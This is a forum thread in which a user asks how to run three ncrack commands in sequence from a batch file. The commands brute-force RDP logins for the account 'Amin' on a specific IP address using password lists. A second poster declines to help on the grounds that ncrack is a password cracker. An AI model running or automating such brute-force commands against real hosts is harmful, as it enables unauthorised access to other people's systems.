how to run automaticaly multiple syntax using cmd.exe

savinio0

New member
Member
Local time
3:36 PM
Messages
73
how to run this? one by one
I open cmd.exe and i paste manually that code one by one how to run this 3 string automatically in a batch file?
After 1'st list finishing starts the second and then starting the 3'rd
ncrack -v --user Amin -P super1.txt 5.2.182.200:3389
ncrack -v --user Amin -P super2.txt 5.2.182.200:3389
ncrack -v --user Amin -P super3.txt 5.2.182.200:3389


i tried this but not good results

echo@off
start /wait ncrack -v --user Amin -P super1.txt 5.2.182.200:3389
start /wait ncrack -v --user Amin -P super2.txt 5.2.182.200:3389
start /wait ncrack -v --user Amin -P super3.txt 5.2.182.200:3389
 

My Computer

Computer type
PC/Desktop
OS
windows xp c86
Would this be the ncrack that is the password cracker? If so I don't think I can comment.
 

My Computer

Computer Manufacturer/Model Number
HP Media Center
OS
Windows 7 32 bit
CPU
AMD 5200+ dual core
Memory
2 GB
Graphics Card(s)
NVidia GeForce 6150SE 128 MB
Monitor(s) Displays
CRT
Screen Resolution
1280x1024
Hard Drives
500 GB Sata internal :

SIIG USB 3.0 docking stations w/WD Caviar Black 6 Gb/s drives
Keyboard
PS/2
Mouse
PS/2 Wheel Mouse
Other Info
SIIG USB 3.0 PCIexpress card.
Back
Top